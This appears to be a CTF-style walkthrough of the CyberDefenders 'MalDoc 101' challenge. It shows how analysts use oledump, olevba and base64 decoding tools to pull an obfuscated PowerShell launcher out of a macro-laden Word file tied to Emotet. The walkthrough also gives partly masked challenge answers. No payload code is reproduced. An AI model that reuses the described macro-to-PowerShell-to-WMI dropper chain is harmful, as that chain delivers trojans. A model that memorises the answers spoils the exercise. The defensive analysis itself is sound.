MalDoc 101 Malware Analysis Walkhthrough
WEBSITE : cyberdefenders.org/
CHALLENGE : MalDoc 101
CATAGORY : MALWARE ANALYSIS ,VBA MACRO
TOOLS : oletools , oledump.py , olevba , strings , deobfuscate-repetitions.py , base64dump.py , tr , grep , re-search.py
#1) Multiple streams contain macros in this document. Provide the number of highest one.
Here we need to find the macro-contained streams. So we use oledump.py to find the macro-contained streams.
And find which is the highest one .
ANS : 1..
#2 What event is used to begin the execution of the macros?
Here we need the help of olevba tool.
what is olevba ?
olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, anti-sandboxing, and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel 4 Macros are also supported in Excel and SLK files.
$ olevba < sample file name >
And look at the table for finding malicious functions and activities
ANS : Doc …..
#3 What malware family was this maldoc attempting to drop?
It’s very very simple.Go to virustotal.com and upload this file for finding more details about this file. Here you can see the malware family
ANS : emo……..
#4 What stream is responsible for the storage of the base64-encoded string?
$ olevba < sample file name>
And scroll down. There we can see a large base64 encoded string. Look at the name of the stream which contains this base64 encoded string.
The next step is to find the number of the stream. use the $ oledump.py < sample file name> and find the number of the base64 stream
ANS : 3…..
#5 This document contains a user-form. Provide the name?
In this question i need the help of LibreOffice Draw . i open the doc file in Draw and go to Tools -> Macros -> Organize macros -> Basic ->sample.bin -> project -> forms -> [ USER FORM NAME]
ANS : roubh….
#6 This document contains an obfuscated base64 encoded string; what value is used to pad (or obfuscate) this string?
Actually, our Analysis process starts here. Because In this question we need to work more. But it was really interesting and have a lot of fun. Here we some basic Linux commands and some new python tools.
Step 1: first we use the strings command and try to find all strings from this doc.
$ strings -a sample.bin
It gives to us a large number of strings. But we don’t need all of them. Then we try to find all the large string which contained minimum1500 bytes.$ strings -n 1500 -a sample.bin
yes, we got a huge base64 encoded string. But in our case, this is not in a useful form. But we can convert it to a useful form.
STEP 2: deobfuscate-repetitions.py is a tool used to find repeated strings from an obfuscated string.
ANS : 2342772g3&*g…………………………
#7 What is the program executed by the base64 encoded string?
Look at the decoded strings in the output of deobfuscate-repetitions.py and
ANS : pow…..
#8 What WMI class is used to create the process to launch the trojan?
We know this is not an understandable form. So our first job is to decode the entire string. First of all, we need to find the decoded PowerShell string from the previous stage. use the -f flag to find the specific decoded string.
$strings -n 1500 -a /home/changalamaadan4n6/Downloads/MalDoc101/sample.bin | ./deobfuscate-repetitions.py -f powersheLL
Yes, we got it.But we Don’t Complete it. So next step is to decode the base64 string with the help of the base64dump.py tool
$strings -n 1500 -a /home/changalamaadan4n6/Downloads/MalDoc101/sample.bin | ./deobfuscate-repetitions.py -f powersheLL | ./base64dump.py
We got a decode string. It’s time to analyze it.
$strings -n 1500 -a /home/changalamaadan4n6/Downloads/MalDoc101/sample.bin | ./deobfuscate-repetitions.py -f powersheLL | ./base64dump.py -s 1 -t utf16
We remove the unwanted +,’,() from this string with the help of the tr command
Let’s deep dive into this string for the answer.
ANS : win32………
#9 Multiple domains were contacted to download a trojan. Provide first FQDN as per the provided hint.
We already analyzed 90% of the doc. So it’s our last stage and a simple one.
Here we pipe a new tool to the previous command. re-search.py is a tool that is used to find the URLs from a string
ANS : haoqu………
LEARN MORE
